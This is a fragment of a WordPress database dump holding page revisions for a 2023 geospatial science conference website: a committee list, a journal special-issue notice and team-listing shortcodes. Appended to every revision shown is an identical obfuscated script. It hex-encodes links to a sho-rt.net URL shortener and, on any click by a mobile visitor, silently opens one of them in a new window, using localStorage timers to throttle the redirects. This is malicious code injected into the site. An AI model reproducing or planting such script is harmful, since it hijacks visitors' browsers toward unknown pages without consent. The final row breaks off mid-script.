Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a>.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2023-01-14 01:57:17','2023-01-14 01:57:17','',3427,'https://gsw2023.com/?p=3552',0,'revision','',0),
(3553,1,'2023-01-14 19:11:39','2023-01-14 19:11:39','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64, 65, 62\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2023-01-14 19:11:39','2023-01-14 19:11:39','',2876,'https://gsw2023.com/?p=3553',0,'revision','',0),
(3554,1,'2023-01-14 19:13:45','2023-01-14 19:13:45','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"66, 75\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\